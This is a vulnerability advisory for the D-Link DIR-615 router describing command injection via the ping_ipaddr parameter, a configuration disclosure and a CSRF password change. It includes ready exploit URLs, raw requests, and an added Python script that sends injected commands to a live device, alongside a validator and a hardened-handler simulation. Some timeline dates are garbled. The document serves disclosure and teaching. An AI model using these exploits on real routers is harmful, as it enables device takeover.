Multiple Remote Vulnerabilities in D-Link DIR-615


Affected Systems:
D-Link DIR-615
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57882
 
The D-Link Wireless N 300 Router (DIR-615) is a consumer wireless router.

The D-Link DIR-615 has multiple security vulnerabilities: remote OS command injection through the ping_ipaddr parameter, which is not validated before it is used in a shell command; disclosure of device configuration details; and an administrative password change that requires neither the current password nor any protection against cross-site request forgery. Attackers can exploit these to disclose sensitive information, take over the administrative account, and execute arbitrary commands in the context of the affected device.
 
<* Source: Michael Messner (michae.messner@integralis.com)

Link: http://www.s3cur1ty.de/m1adv2013-008
http://www.osvdb.org/90174
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk.
Device Name: DIR-615 - Hardware revision H1
Vendor: D-Link

============= Device Description: ====================

Delivering great wireless performance, network security and coverage, the D-Link Wireless N 300 Router (DIR-615) is ideal for upgrading your existing wireless home network.

Source: http://www.dlink.com/us/en/support/product/dir-615-wireless-n-300-router

============= Vulnerable Firmware Releases: ==================

Firmware Version: 8.04, Tue, 4, Sep, 2012
Firmware Version: 8.04, Fri, 18, Jan, 2013


=========== Vulnerability Overview: ======================


* OS-Command Injection:
=> Parameter: ping_ipaddr

The vulnerability is caused by missing input validation of the ping_ipaddr parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd, or to upload and execute a backdoor, and thereby compromise the device.
You need to be authenticated to the device, or you have to find other methods for inserting the malicious commands.

Example Exploit:

http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr=

Request:
GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.178.199/adv_virtual_batch.htm
Connection: keep-alive

Response:
HTTP/1.0 200 OK
Pragma: no-cache
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript" src="common.js.htm"></script>
<script language="javascript">
CommJs({init: INC_COMM_PAGE, group: PAGE_GROUP_TOOLS});
var pingResult = "Domain ";
var pingip = "Listen 4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown";  <=
var vctinfo = [
{ethport:'0', status:'0', rate:'0', dup:'0'},
{ethport:'1', status:'0', rate:'0', dup:'0'},
{ethport:'2', status:'0', rate:'0', dup:'0'},

wget is available on the device for downloading further tools.

* Information Disclosure:

Detailed device information with configuration details.

Request:
http://192.168.178.199/gconfig.htm

Response:
var ModelName='dir-615'; var systemName='dlink-dir615'; var FunctionList={region:1, PRIORITY_WEB_ACCOUNT_NUM:1, has_1_6_auto_config:1, Region:1, Region:1, support_00006_dslite:1, has_00006_6rd:0, NON_USED:0}
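
As an added example (not part of the advisory and not D-Link's code), the following Python script ties the two findings above together: it builds the advisory's ping_ipaddr injection URL, scrapes the command output out of the `var pingip = "..."` line of the tools_vct.htm response, and reuses the same `var` scraper on gconfig.htm output. It also shows the input check the firmware is missing. The sample responses embedded in it are constructed from the output quoted in the advisory, the handling of the `Listen 4_` prefix is an assumption based on that single capture, and `run_command()` is the only part that touches the network (the device requires an authenticated session, so a `uid=` cookie has to be supplied).

```python
import ipaddress
import re
import urllib.parse
import urllib.request

# Constructed sample of the tools_vct.htm response quoted in the advisory
# (abridged; not captured from a real device).
SAMPLE_VCT_RESPONSE = """<html><head>
<script language="javascript">
var pingResult = "Domain ";
var pingip = "Listen 4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown";
var vctinfo = [
{ethport:'0', status:'0', rate:'0', dup:'0'},
];
</script></head></html>"""

# Constructed sample of the gconfig.htm output (abridged from the advisory).
SAMPLE_GCONFIG_RESPONSE = (
    "var ModelName='dir-615'; var systemName='dlink-dir615'; "
    "var FunctionList={region:1, PRIORITY_WEB_ACCOUNT_NUM:1, NON_USED:0}"
)

# Matches `var name = value;` where value is a double-quoted string, a
# single-quoted string, a one-level object literal, or anything up to ';'.
JS_VAR_RE = re.compile(
    r"var\s+(\w+)\s*=\s*"
    r"(\"(?:[^\"\\]|\\.)*\"|'(?:[^'\\]|\\.)*'|\{[^}]*\}|[^;]+);?"
)


def parse_js_vars(html):
    """Return {name: value} for each `var` assignment in a DIR-615 page.
    Quoted strings come back without their quotes; other values verbatim."""
    found = {}
    for name, raw in JS_VAR_RE.findall(html):
        raw = raw.strip()
        if len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in "\"'":
            raw = raw[1:-1]
        found[name] = raw
    return found


def build_injection_url(host, command, marker_ip="1.1.1.1"):
    """Build the advisory's exploit URL: `command` wrapped in backticks and
    appended to a harmless marker address inside ping_ipaddr."""
    query = urllib.parse.urlencode(
        {"page": "tools_vct", "hping": "0",
         "ping_ipaddr": f"{marker_ip}`{command}`", "ping6_ipaddr": ""},
        quote_via=urllib.parse.quote,  # %20 for spaces, as in the advisory
    )
    return f"http://{host}/tools_vct.htm?{query}"


def extract_command_output(html, marker_ip="1.1.1.1"):
    """Pull the injected command's stdout out of the `pingip` variable.
    Assumption from the single captured response: the device echoes
    'Listen 4_<marker ip>' and appends the backtick-substituted output,
    so everything after the marker address is the command result."""
    pingip = parse_js_vars(html).get("pingip")
    if pingip is None:
        return None
    _, sep, tail = pingip.partition(marker_ip)
    return tail.strip() if sep else None


def run_command(host, command, session_cookie=None, timeout=10):
    """Send the injection to a live device and return the command output.
    Needs an authenticated session, e.g. session_cookie='uid=...'.
    This is the only network call; nothing else here goes online."""
    req = urllib.request.Request(build_injection_url(host, command))
    if session_cookie:
        req.add_header("Cookie", session_cookie)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_command_output(resp.read().decode("utf-8", "replace"))


HOSTNAME_RE = re.compile(
    r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


def is_safe_ping_target(value):
    """The input check the firmware lacks: accept a literal IPv4/IPv6 address
    or a plain hostname, nothing else. Even with this check the target must be
    handed to ping as a separate argv element, never spliced into a shell string."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(value) is not None


if __name__ == "__main__":
    print(build_injection_url("192.168.178.199", "uname -a"))
    print(extract_command_output(SAMPLE_VCT_RESPONSE))
    print(parse_js_vars(SAMPLE_GCONFIG_RESPONSE))
```

The validator rejects the advisory's payload because a backtick is neither part of an IP address nor a hostname character, but the durable fix is to stop building a shell command line at all and exec ping with the target as its own argument.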

* Changing the password does not require the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser session, which the CSRF vector below provides.

POST /tools_admin.htm HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/tools_admin.htm
Cookie: uid=wBIfbpFoJ9
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

page=tools_admin&admin_password1=admin&admin_password2=admin&hostname=DIR-615

* CSRF for changing the password without knowing the current one:

http://192.168.178.199/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615
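
To make the two password-change weaknesses concrete, here is an added Python simulation (not the device's firmware and not code from the advisory) of a /tools_admin.htm handler. `vulnerable_tools_admin` reproduces the behaviour described above: any request that rides on a valid session cookie and carries two matching admin_password fields changes the password, whether it arrives as the advisory's POST body or as the GET URL a CSRF page would load. `hardened_tools_admin` adds the three missing checks: POST only, a per-session CSRF token, and proof of the current password. The in-memory session store, the reuse of the advisory's uid cookie value as a session key, and the field names `csrf_token` and `current_password` are assumptions made for the simulation.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

PBKDF2_ROUNDS = 50_000


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_state(password="admin"):
    """Constructed in-memory device state: one admin password and one logged-in
    session keyed by the uid cookie value seen in the advisory's POST (assumed)."""
    salt = secrets.token_bytes(16)
    return {
        "salt": salt,
        "pw_hash": _hash(password, salt),
        "sessions": {"wBIfbpFoJ9": {"csrf": secrets.token_urlsafe(32)}},
    }


def check_password(state, candidate):
    return hmac.compare_digest(_hash(candidate, state["salt"]), state["pw_hash"])


def set_password(state, new_password):
    state["salt"] = secrets.token_bytes(16)
    state["pw_hash"] = _hash(new_password, state["salt"])


class Request:
    """Minimal stand-in for an HTTP request to /tools_admin.htm."""

    def __init__(self, method, url, cookie_uid=None, body=""):
        self.method = method
        self.url = url
        self.cookie_uid = cookie_uid  # value of the uid cookie, or None
        self.body = body

    def params(self):
        # The device honours the same fields in the query string (GET) and the
        # form body (POST); merge both the way a permissive CGI does.
        merged = parse_qs(urlparse(self.url).query, keep_blank_values=True)
        merged.update(parse_qs(self.body, keep_blank_values=True))
        return {k: v[0] for k, v in merged.items()}


def vulnerable_tools_admin(req, state):
    """Behaviour the advisory describes: a valid session plus two matching
    new-password fields is all it takes. Returns an HTTP-style status code."""
    if req.cookie_uid not in state["sessions"]:
        return 401
    p = req.params()
    if p.get("page") != "tools_admin" or not p.get("admin_password1"):
        return 400
    if p["admin_password1"] != p.get("admin_password2"):
        return 400
    set_password(state, p["admin_password1"])
    return 200


def hardened_tools_admin(req, state):
    """Same endpoint with the three checks the firmware lacks: state-changing
    requests must be POST, must carry the session's CSRF token, and must
    prove knowledge of the current password."""
    session = state["sessions"].get(req.cookie_uid)
    if session is None:
        return 401
    if req.method != "POST":
        return 405
    p = req.params()
    token = p.get("csrf_token", "").encode()
    if not hmac.compare_digest(token, session["csrf"].encode()):
        return 403
    if not check_password(state, p.get("current_password", "")):
        return 403
    if p.get("page") != "tools_admin" or not p.get("admin_password1"):
        return 400
    if p["admin_password1"] != p.get("admin_password2"):
        return 400
    set_password(state, p["admin_password1"])
    return 200


# The advisory's CSRF URL and POST body, replayed against both handlers.
CSRF_URL = ("http://192.168.178.199/tools_admin.htm?page=tools_admin"
            "&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615")
POST_BODY = "page=tools_admin&admin_password1=admin&admin_password2=admin&hostname=DIR-615"


if __name__ == "__main__":
    state = make_state("admin")
    status = vulnerable_tools_admin(Request("GET", CSRF_URL, "wBIfbpFoJ9"), state)
    print("vulnerable, cross-site GET:", status, "now admin2:", check_password(state, "admin2"))
    state = make_state("admin")
    status = hardened_tools_admin(Request("GET", CSRF_URL, "wBIfbpFoJ9"), state)
    print("hardened, cross-site GET:", status, "still admin:", check_password(state, "admin"))
```

The CSRF token alone would already stop the cross-site GET and the blind POST, but requiring the current password is what protects against the other scenario in the advisory: an attacker sitting at an unlocked, already-authenticated browser.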

=============== Solution ==================

No known solution available.

============= Credits =================

The vulnerability was discovered by Michael Messner
Mail: devnull # at # s3cur1ty # dot # de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============= Time Line: ======================

November 2012 - discovered vulnerability
11.11.2012 - contacted D-Link via the web interface http://www.dlink.com/us/en/support/contact-support
12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012 - D-Link responded that they will check the findings *h00ray*
11.01.2013 - requested status update
25.01.2013 - requested status update
252.161.2013 - D-Link responded that this is a security problem of the user and/or browser and they will not provide a fix
xx1_2.2013 - no update from D-Link, public release

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
D-Link
------
Currently, the vendor does not provide patches or upgrades. Users of the affected firmware should watch the vendor's homepage for a fixed version:
 
http://www.dlink.com/
